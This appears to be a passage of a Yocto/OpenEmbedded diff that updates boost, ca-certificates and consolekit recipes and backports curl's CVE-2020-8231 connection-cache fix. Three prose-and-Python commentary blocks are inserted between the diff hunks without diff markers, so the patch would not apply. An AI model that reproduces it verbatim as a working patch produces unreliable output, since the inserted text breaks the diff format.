- return __sync_fetch_and_add( &value_, 0 );
-+#endif
- }
-
- private:
diff --git a/meta/recipes-support/boost/boost_1.72.0.bb b/meta/recipes-support/boost/boost_1.72.0.bb
index 51c84bc935..b3ec11933c 100644
--- a/meta/recipes-support/boost/boost_1.72.0.bb
+++ b/meta/recipes-support/boost/boost_1.72.0.bb
@@ -1,7 +1,7 @@
require boost-${PV}.inc
require boost.inc
-SRC_URI += "file://arm-intrinsics.patch \
+SRC_URI += " \
file://boost-CVE-2012-2677.patch \
file://boost-math-disable-pch-for-gcc.patch \
file://0001-Apply-boost-1.62.0-no-forced-flags.patch.patch \
@@ -9,4 +9,6 @@ SRC_URI += "file://arm-intrinsics.patch \
file://0001-dont-setup-compiler-flags-m32-m64.patch \
file://0001-revert-cease-dependence-on-range.patch \
file://0001-added-typedef-executor_type.patch \
+ file://0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch \
+ file://0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch \
"
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
new file mode 100644
index 0000000000..5c4a32f526
--- /dev/null
+++ b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
@@ -0,0 +1,80 @@
+From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Mon, 18 Oct 2021 12:05:49 +0200
+Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired
+ certificates."
+
+This avoids a dependency on python3-cryptography; the dropped check only
+warns about expired certs (which is an upstream concern, but not ours).
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ debian/changelog | 1 -
+ debian/control | 2 +-
+ mozilla/certdata2pem.py | 11 -----------
+ 3 files changed, 1 insertion(+), 13 deletions(-)
+
+diff --git a/debian/changelog b/debian/changelog
+index 531e4d0..4006509 100644
+--- a/debian/changelog
++++ b/debian/changelog
+@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low
+ - "Trustis FPS Root CA"
+ - "Staat der Nederlanden Root CA - G3"
+ * Blacklist expired root certificate "DST Root CA X3" (closes: #995432)
+- * mozilla/certdata2pem.py: print a warning for expired certificates.
+
+ -- Julien Cristau <jcristau@debian.org> Thu, 07 Oct 2021 17:12:47 +0200
+
+diff --git a/debian/control b/debian/control
+index 4434b7a..5c6ba24 100644
+--- a/debian/control
++++ b/debian/control
+@@ -3,7 +3,7 @@ Section: misc
+ Priority: optional
+ Maintainer: Julien Cristau <jcristau@debian.org>
+ Build-Depends: debhelper-compat (= 13), po-debconf
+-Build-Depends-Indep: python3, openssl, python3-cryptography
++Build-Depends-Indep: python3, openssl
+ Standards-Version: 4.5.0.2
+ Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git
+ Vcs-Browser: https://salsa.debian.org/debian/ca-certificates
+diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
+index ede23d4..7d796f1 100644
+--- a/mozilla/certdata2pem.py
++++ b/mozilla/certdata2pem.py
+@@ -21,16 +21,12 @@
+ # USA.
+
+ import base64
+-import datetime
+ import os.path
+ import re
+ import sys
+ import textwrap
+ import io
+
+-from cryptography import x509
+-
+-
+ objects = []
+
+ # Dirty file parser.
+@@ -121,13 +117,6 @@ for obj in objects:
+ if obj['CKA_CLASS'] == 'CKO_CERTIFICATE':
+ if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]:
+ continue
+-
+- cert = x509.load_der_x509_certificate(obj['CKA_VALUE'])
+- if cert.not_valid_after < datetime.datetime.now():
+- print('!'*74)
+- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL'])
+- print('!'*74)
+-
+ bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\
+ .replace(' ', '_')\
+ .replace('(', '=')\
+--
+2.20.1
+
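For reference, the reverted hunk removed roughly the following warning, which is what pulled in the python3-cryptography build dependency (sketch assumes a recent cryptography release; der_bytes stands in for the object's CKA_VALUE):

    # Roughly the expiry warning removed by the revert (needs python3-cryptography).
    import datetime
    from cryptography import x509

    def warn_if_expired(label, der_bytes):
        cert = x509.load_der_x509_certificate(der_bytes)
        if cert.not_valid_after < datetime.datetime.now():
            print('!' * 74)
            print('Trusted but expired certificate found: %s' % label)
            print('!' * 74)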
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
deleted file mode 100644
index aa2c85ff43..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From b6d18ca77f131cdcaa10d0eaa9d303399767edf6 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:18:14 +0200
-Subject: [PATCH] certdata2pem.py: use python3
-
-Comments in that file imply it is already py3 compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- mozilla/Makefile | 2 +-
- mozilla/certdata2pem.py | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/mozilla/Makefile b/mozilla/Makefile
-index 6f46118..f98877c 100644
---- a/mozilla/Makefile
-+++ b/mozilla/Makefile
-@@ -3,7 +3,7 @@
- #
-
- all:
-- python certdata2pem.py
-+ python3 certdata2pem.py
-
- clean:
- -rm -f *.crt
-diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
-index 0b02b2a..7d796f1 100644
---- a/mozilla/certdata2pem.py
-+++ b/mozilla/certdata2pem.py
-@@ -1,4 +1,4 @@
--#!/usr/bin/python
-+#!/usr/bin/python3
- # vim:set et sw=4:
- #
- # certdata2pem.py - splits certdata.txt into multiple files
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
deleted file mode 100644
index a113fa8b15..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-Upstream-Status: Pending
-
-Let us alter the install destination of the script via SBINDIR
-
---- ca-certificates-20130119.orig/sbin/Makefile
-+++ ca-certificates-20130119/sbin/Makefile
-@@ -3,9 +3,12 @@
- #
- #
-
-+SBINDIR = /usr/sbin
-+
- all:
-
- clean:
-
- install:
-- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/
-+ install -d $(DESTDIR)$(SBINDIR)
-+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
deleted file mode 100644
index 6e2171f758..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 30378026d136efa779732e3f6664e2ecf461e458 Mon Sep 17 00:00:00 2001
-From: Patrick Ohly <patrick.ohly@intel.com>
-Date: Thu, 17 Mar 2016 12:38:09 +0100
-Subject: [PATCH] update-ca-certificates: support Toybox
-
-"mktemp -t" is deprecated and does not work when using Toybox. Replace
-with something that works also with Toybox.
-
-Upstream-Status: Pending
-
-Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
----
- sbin/update-ca-certificates | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates
-index 79c41bb..ae9e3f1 100755
---- a/sbin/update-ca-certificates
-+++ b/sbin/update-ca-certificates
-@@ -113,9 +113,9 @@ trap cleanup 0
-
- # Helper files. (Some of them are not simple arrays because we spawn
- # subshells later on.)
--TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")"
--ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
--REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
-+TEMPBUNDLE="$(mktemp -p${TMPDIR:-/tmp} "${CERTBUNDLE}.tmp.XXXXXX")"
-+ADDED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-+REMOVED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-
- # Adds a certificate to the list of trusted ones. This includes a symlink
- # in /etc/ssl/certs to the certificate file and its inclusion into the
---
-2.1.4
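The deleted patch had replaced the deprecated "mktemp -t" with mktemp -p"${TMPDIR:-/tmp}" so the helper files are created in an explicitly named directory that Toybox's mktemp also accepts. The same idea expressed with Python's tempfile module, purely as a sketch:

    # Create helper temp files under ${TMPDIR:-/tmp} with an explicit directory,
    # mirroring mktemp -p"${TMPDIR:-/tmp}" "ca-certificates.tmp.XXXXXX".
    import os
    import tempfile

    tmpdir = os.environ.get("TMPDIR", "/tmp")
    fd, added = tempfile.mkstemp(prefix="ca-certificates.tmp.", dir=tmpdir)
    os.close(fd)
    print(added)   # e.g. /tmp/ca-certificates.tmp.k3j2x_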
diff --git a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
index ce3cb217a1..a54d6b458a 100644
--- a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb
+++ b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
@@ -5,7 +5,7 @@ This derived from Debian's CA Certificates."
HOMEPAGE = "http://packages.debian.org/sid/ca-certificates"
SECTION = "misc"
LICENSE = "GPL-2.0+ & MPL-2.0"
-LIC_FILES_CHKSUM = "file://debian/copyright;md5=aeb420429b1659507e0a5a1b123e8308"
+LIC_FILES_CHKSUM = "file://debian/copyright;md5=ae5b36b514e3f12ce1aa8e2ee67f3d7e"
# This is needed to ensure we can run the postinst at image creation time
DEPENDS = ""
@@ -14,17 +14,16 @@ DEPENDS_class-nativesdk = "openssl-native"
# Need rehash from openssl and run-parts from debianutils
PACKAGE_WRITE_DEPS += "openssl-native debianutils-native"
-SRCREV = "c28799b138b044c963d24c4a69659b6e5486e3be"
+SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8"
-SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \
file://0002-update-ca-certificates-use-SYSROOT.patch \
file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \
- file://update-ca-certificates-support-Toybox.patch \
file://default-sysroot.patch \
- file://sbindir.patch \
file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \
- file://0001-certdata2pem.py-use-python3.patch \
+ file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \
"
+UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)"
S = "${WORKDIR}/git"
@@ -83,8 +82,8 @@ do_install_append_class-native () {
SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates
}
-RDEPENDS_${PN}_class-target = "openssl-bin"
-RDEPENDS_${PN}_class-native = "openssl-native"
-RDEPENDS_${PN}_class-nativesdk = "nativesdk-openssl-bin"
+RDEPENDS_${PN}_append_class-target = " openssl-bin openssl"
+RDEPENDS_${PN}_append_class-native = " openssl-native"
+RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl"
BBCLASSEXTEND = "native nativesdk"
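The new UPSTREAM_CHECK_GITTAGREGEX treats the whole date-style tag as the version; a quick Python check against the tag that matches this release:

    # Quick check of the tag regex added to the recipe.
    import re

    match = re.match(r"(?P<pver>\d+)", "20211016")
    print(match.group("pver"))   # 20211016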
diff --git a/meta/recipes-support/consolekit/consolekit_0.4.6.bb b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
index 89f2d77b66..22e755747b 100644
--- a/meta/recipes-support/consolekit/consolekit_0.4.6.bb
+++ b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
@@ -1,4 +1,6 @@
SUMMARY = "Framework for defining and tracking users, login sessions, and seats"
+DESCRIPTION = "It provides a mechanism for software to react to changes \
+of any of these items or of any of the metadata associated with them."
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit"
BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit"
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8231.patch b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
new file mode 100644
index 0000000000..51f40047f1
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
@@ -0,0 +1,1092 @@
+From c3359693e17fccdf2a04f0b908bc8f51cdc38133 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 27 Apr 2020 00:33:21 +0200
+Subject: [PATCH 1/3] conncache: various concept cleanups
+
+More connection cache accesses are protected by locks.
+
+CONNCACHE_* is a better prefix for the connection cache lock macros.
+
+Curl_attach_connnection: now called as soon as there's a connection
+struct available and before the connection is added to the connection
+cache.
+
+Curl_disconnect: now assumes that the connection is already removed from
+the connection cache.
+
+Ref: #4915
+Closes #5009
+
+Upstream-commit: c06902713998d68202c5a764de910ba8d0e8f54d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0004-curl-7.69.1-CVE-2020-8231.patch ]
+CVE: CVE-2020-8231
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/conncache.c | 87 ++++++++++++++++++++-----------------------
+ lib/conncache.h | 9 ++---
+ lib/hostip.c | 12 +++---
+ lib/http_negotiate.h | 6 ++-
+ lib/http_ntlm.h | 6 ++-
+ lib/multi.c | 56 ++++++++++++++--------------
+ lib/multiif.h | 1 +
+ lib/url.c | 69 ++++++++++++++++++----------------
+ tests/data/test1554 | 14 +++++++
+ tests/unit/unit1620.c | 6 +--
+ 10 files changed, 139 insertions(+), 127 deletions(-)
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index cbd3bb1..95fcea6 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -49,53 +49,51 @@ static void conn_llist_dtor(void *user, void *element)
+ conn->bundle = NULL;
+ }
+
+-static CURLcode bundle_create(struct Curl_easy *data,
+- struct connectbundle **cb_ptr)
++static CURLcode bundle_create(struct connectbundle **bundlep)
+ {
+- (void)data;
+- DEBUGASSERT(*cb_ptr == NULL);
+- *cb_ptr = malloc(sizeof(struct connectbundle));
+- if(!*cb_ptr)
++ DEBUGASSERT(*bundlep == NULL);
++ *bundlep = malloc(sizeof(struct connectbundle));
++ if(!*bundlep)
+ return CURLE_OUT_OF_MEMORY;
+
+- (*cb_ptr)->num_connections = 0;
+- (*cb_ptr)->multiuse = BUNDLE_UNKNOWN;
++ (*bundlep)->num_connections = 0;
++ (*bundlep)->multiuse = BUNDLE_UNKNOWN;
+
+- Curl_llist_init(&(*cb_ptr)->conn_list, (curl_llist_dtor) conn_llist_dtor);
++ Curl_llist_init(&(*bundlep)->conn_list, (curl_llist_dtor) conn_llist_dtor);
+ return CURLE_OK;
+ }
+
+-static void bundle_destroy(struct connectbundle *cb_ptr)
++static void bundle_destroy(struct connectbundle *bundle)
+ {
+- if(!cb_ptr)
++ if(!bundle)
+ return;
+
+- Curl_llist_destroy(&cb_ptr->conn_list, NULL);
++ Curl_llist_destroy(&bundle->conn_list, NULL);
+
+- free(cb_ptr);
++ free(bundle);
+ }
+
+ /* Add a connection to a bundle */
+-static void bundle_add_conn(struct connectbundle *cb_ptr,
++static void bundle_add_conn(struct connectbundle *bundle,
+ struct connectdata *conn)
+ {
+- Curl_llist_insert_next(&cb_ptr->conn_list, cb_ptr->conn_list.tail, conn,
++ Curl_llist_insert_next(&bundle->conn_list, bundle->conn_list.tail, conn,
+ &conn->bundle_node);
+- conn->bundle = cb_ptr;
+- cb_ptr->num_connections++;
++ conn->bundle = bundle;
++ bundle->num_connections++;
+ }
+
+ /* Remove a connection from a bundle */
+-static int bundle_remove_conn(struct connectbundle *cb_ptr,
++static int bundle_remove_conn(struct connectbundle *bundle,
+ struct connectdata *conn)
+ {
+ struct curl_llist_element *curr;
+
+- curr = cb_ptr->conn_list.head;
++ curr = bundle->conn_list.head;
+ while(curr) {
+ if(curr->ptr == conn) {
+- Curl_llist_remove(&cb_ptr->conn_list, curr, NULL);
+- cb_ptr->num_connections--;
++ Curl_llist_remove(&bundle->conn_list, curr, NULL);
++ bundle->num_connections--;
+ conn->bundle = NULL;
+ return 1; /* we removed a handle */
+ }
+@@ -162,20 +160,15 @@ static void hashkey(struct connectdata *conn, char *buf,
+ msnprintf(buf, len, "%ld%s", port, hostname);
+ }
+
+-void Curl_conncache_unlock(struct Curl_easy *data)
+-{
+- CONN_UNLOCK(data);
+-}
+-
+ /* Returns number of connections currently held in the connection cache.
+ Locks/unlocks the cache itself!
+ */
+ size_t Curl_conncache_size(struct Curl_easy *data)
+ {
+ size_t num;
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ num = data->state.conn_cache->num_conn;
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return num;
+ }
+
+@@ -188,7 +181,7 @@ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+ const char **hostp)
+ {
+ struct connectbundle *bundle = NULL;
+- CONN_LOCK(conn->data);
++ CONNCACHE_LOCK(conn->data);
+ if(connc) {
+ char key[HASHKEY_SIZE];
+ hashkey(conn, key, sizeof(key), hostp);
+@@ -235,8 +228,7 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ struct connectdata *conn)
+ {
+ CURLcode result = CURLE_OK;
+- struct connectbundle *bundle;
+- struct connectbundle *new_bundle = NULL;
++ struct connectbundle *bundle = NULL;
+ struct Curl_easy *data = conn->data;
+
+ /* *find_bundle() locks the connection cache */
+@@ -245,20 +237,19 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ int rc;
+ char key[HASHKEY_SIZE];
+
+- result = bundle_create(data, &new_bundle);
++ result = bundle_create(&bundle);
+ if(result) {
+ goto unlock;
+ }
+
+ hashkey(conn, key, sizeof(key), NULL);
+- rc = conncache_add_bundle(data->state.conn_cache, key, new_bundle);
++ rc = conncache_add_bundle(data->state.conn_cache, key, bundle);
+
+ if(!rc) {
+- bundle_destroy(new_bundle);
++ bundle_destroy(bundle);
+ result = CURLE_OUT_OF_MEMORY;
+ goto unlock;
+ }
+- bundle = new_bundle;
+ }
+
+ bundle_add_conn(bundle, conn);
+@@ -270,15 +261,17 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ conn->connection_id, connc->num_conn));
+
+ unlock:
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+
+ return result;
+ }
+
+ /*
+- * Removes the connectdata object from the connection cache *and* clears the
+- * ->data pointer association. Pass TRUE/FALSE in the 'lock' argument
+- * depending on if the parent function already holds the lock or not.
++ * Removes the connectdata object from the connection cache, but does *not*
++ * clear the conn->data association. The transfer still owns this connection.
++ *
++ * Pass TRUE/FALSE in the 'lock' argument depending on if the parent function
++ * already holds the lock or not.
+ */
+ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ struct connectdata *conn, bool lock)
+@@ -290,7 +283,7 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ due to a failed connection attempt, before being added to a bundle */
+ if(bundle) {
+ if(lock) {
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ }
+ bundle_remove_conn(bundle, conn);
+ if(bundle->num_connections == 0)
+@@ -301,9 +294,8 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ DEBUGF(infof(data, "The cache now contains %zu members\n",
+ connc->num_conn));
+ }
+- conn->data = NULL; /* clear the association */
+ if(lock) {
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ }
+ }
+ }
+@@ -332,7 +324,7 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+ if(!connc)
+ return FALSE;
+
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ Curl_hash_start_iterate(&connc->hash, &iter);
+
+ he = Curl_hash_next_element(&iter);
+@@ -350,12 +342,12 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+ curr = curr->next;
+
+ if(1 == func(conn, param)) {
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return TRUE;
+ }
+ }
+ }
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return FALSE;
+ }
+
+@@ -494,7 +486,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+
+ now = Curl_now();
+
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ Curl_hash_start_iterate(&connc->hash, &iter);
+
+ he = Curl_hash_next_element(&iter);
+@@ -531,7 +523,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+ connc->num_conn));
+ conn_candidate->data = data; /* associate! */
+ }
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+
+ return conn_candidate;
+ }
+@@ -548,6 +540,7 @@ void Curl_conncache_close_all_connections(struct conncache *connc)
+ sigpipe_ignore(conn->data, &pipe_st);
+ /* This will remove the connection from the cache */
+ connclose(conn, "kill all");
++ Curl_conncache_remove_conn(conn->data, conn, TRUE);
+ (void)Curl_disconnect(connc->closure_handle, conn, FALSE);
+ sigpipe_restore(&pipe_st);
+
+diff --git a/lib/conncache.h b/lib/conncache.h
+index e3e4c9c..3dda21c 100644
+--- a/lib/conncache.h
++++ b/lib/conncache.h
+@@ -45,21 +45,21 @@ struct conncache {
+ #ifdef CURLDEBUG
+ /* the debug versions of these macros make extra certain that the lock is
+ never doubly locked or unlocked */
+-#define CONN_LOCK(x) if((x)->share) { \
++#define CONNCACHE_LOCK(x) if((x)->share) { \
+ Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE); \
+ DEBUGASSERT(!(x)->state.conncache_lock); \
+ (x)->state.conncache_lock = TRUE; \
+ }
+
+-#define CONN_UNLOCK(x) if((x)->share) { \
++#define CONNCACHE_UNLOCK(x) if((x)->share) { \
+ DEBUGASSERT((x)->state.conncache_lock); \
+ (x)->state.conncache_lock = FALSE; \
+ Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT); \
+ }
+ #else
+-#define CONN_LOCK(x) if((x)->share) \
++#define CONNCACHE_LOCK(x) if((x)->share) \
+ Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE)
+-#define CONN_UNLOCK(x) if((x)->share) \
++#define CONNCACHE_UNLOCK(x) if((x)->share) \
+ Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT)
+ #endif
+
+@@ -77,7 +77,6 @@ void Curl_conncache_destroy(struct conncache *connc);
+ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+ struct conncache *connc,
+ const char **hostp);
+-void Curl_conncache_unlock(struct Curl_easy *data);
+ /* returns number of connections currently held in the connection cache */
+ size_t Curl_conncache_size(struct Curl_easy *data);
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index c0feb79..f5bb634 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -1085,10 +1085,12 @@ CURLcode Curl_once_resolved(struct connectdata *conn,
+
+ result = Curl_setup_conn(conn, protocol_done);
+
+- if(result)
+- /* We're not allowed to return failure with memory left allocated
+- in the connectdata struct, free those here */
+- Curl_disconnect(conn->data, conn, TRUE); /* close the connection */
+-
++ if(result) {
++ struct Curl_easy *data = conn->data;
++ DEBUGASSERT(data);
++ Curl_detach_connnection(data);
++ Curl_conncache_remove_conn(data, conn, TRUE);
++ Curl_disconnect(data, conn, TRUE);
++ }
+ return result;
+ }
+diff --git a/lib/http_negotiate.h b/lib/http_negotiate.h
+index 4f0ac16..a737f6f 100644
+--- a/lib/http_negotiate.h
++++ b/lib/http_negotiate.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -33,6 +33,8 @@ CURLcode Curl_output_negotiate(struct connectdata *conn, bool proxy);
+
+ void Curl_http_auth_cleanup_negotiate(struct connectdata *conn);
+
+-#endif /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#else /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#define Curl_http_auth_cleanup_negotiate(x)
++#endif
+
+ #endif /* HEADER_CURL_HTTP_NEGOTIATE_H */
+diff --git a/lib/http_ntlm.h b/lib/http_ntlm.h
+index 003714d..3ebdf97 100644
+--- a/lib/http_ntlm.h
++++ b/lib/http_ntlm.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -35,6 +35,8 @@ CURLcode Curl_output_ntlm(struct connectdata *conn, bool proxy);
+
+ void Curl_http_auth_cleanup_ntlm(struct connectdata *conn);
+
+-#endif /* !CURL_DISABLE_HTTP && USE_NTLM */
++#else /* !CURL_DISABLE_HTTP && USE_NTLM */
++#define Curl_http_auth_cleanup_ntlm(x)
++#endif
+
+ #endif /* HEADER_CURL_HTTP_NTLM_H */
+diff --git a/lib/multi.c b/lib/multi.c
+index e10e752..273653d 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -79,7 +79,6 @@ static CURLMcode add_next_timeout(struct curltime now,
+ static CURLMcode multi_timeout(struct Curl_multi *multi,
+ long *timeout_ms);
+ static void process_pending_handles(struct Curl_multi *multi);
+-static void detach_connnection(struct Curl_easy *data);
+
+ #ifdef DEBUGBUILD
+ static const char * const statename[]={
+@@ -112,7 +111,7 @@ static void Curl_init_completed(struct Curl_easy *data)
+
+ /* Important: reset the conn pointer so that we don't point to memory
+ that could be freed anytime */
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+ Curl_expire_clear(data); /* stop all timers */
+ }
+
+@@ -506,6 +505,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ easy handle is added */
+ memset(&multi->timer_lastcall, 0, sizeof(multi->timer_lastcall));
+
++ CONNCACHE_LOCK(data);
+ /* The closure handle only ever has default timeouts set. To improve the
+ state somewhat we clone the timeouts from each added handle so that the
+ closure handle always has the same timeouts as the most recently added
+@@ -515,6 +515,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ data->set.server_response_timeout;
+ data->state.conn_cache->closure_handle->set.no_signal =
+ data->set.no_signal;
++ CONNCACHE_UNLOCK(data);
+
+ Curl_update_timer(multi);
+ return CURLM_OK;
+@@ -589,14 +590,14 @@ static CURLcode multi_done(struct Curl_easy *data,
+
+ process_pending_handles(data->multi); /* connection / multiplex */
+
+- CONN_LOCK(data);
+- detach_connnection(data);
++ CONNCACHE_LOCK(data);
++ Curl_detach_connnection(data);
+ if(CONN_INUSE(conn)) {
+ /* Stop if still used. */
+ /* conn->data must not remain pointing to this transfer since it is going
+ away! Find another to own it! */
+ conn->data = conn->easyq.head->ptr;
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ DEBUGF(infof(data, "Connection still in use %zu, "
+ "no more multi_done now!\n",
+ conn->easyq.size));
+@@ -647,7 +648,8 @@ static CURLcode multi_done(struct Curl_easy *data,
+ || (premature && !(conn->handler->flags & PROTOPT_STREAM))) {
+ CURLcode res2;
+ connclose(conn, "disconnecting");
+- CONN_UNLOCK(data);
++ Curl_conncache_remove_conn(data, conn, FALSE);
++ CONNCACHE_UNLOCK(data);
+ res2 = Curl_disconnect(data, conn, premature);
+
+ /* If we had an error already, make sure we return that one. But
+@@ -666,7 +668,7 @@ static CURLcode multi_done(struct Curl_easy *data,
+ conn->bits.conn_to_host ? conn->conn_to_host.dispname :
+ conn->host.dispname);
+ /* the connection is no longer in use by this transfer */
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ if(Curl_conncache_return_conn(data, conn)) {
+ /* remember the most recently used connection */
+ data->state.lastconnect = conn;
+@@ -774,8 +776,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ vanish with this handle */
+
+ /* Remove the association between the connection and the handle */
+- if(data->conn)
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+
+ #ifdef USE_LIBPSL
+ /* Remove the PSL association. */
+@@ -824,9 +825,13 @@ bool Curl_multiplex_wanted(const struct Curl_multi *multi)
+ return (multi && (multi->multiplexing));
+ }
+
+-/* This is the only function that should clear data->conn. This will
+- occasionally be called with the pointer already cleared. */
+-static void detach_connnection(struct Curl_easy *data)
++/*
++ * Curl_detach_connnection() removes the given transfer from the connection.
++ *
++ * This is the only function that should clear data->conn. This will
++ * occasionally be called with the data->conn pointer already cleared.
++ */
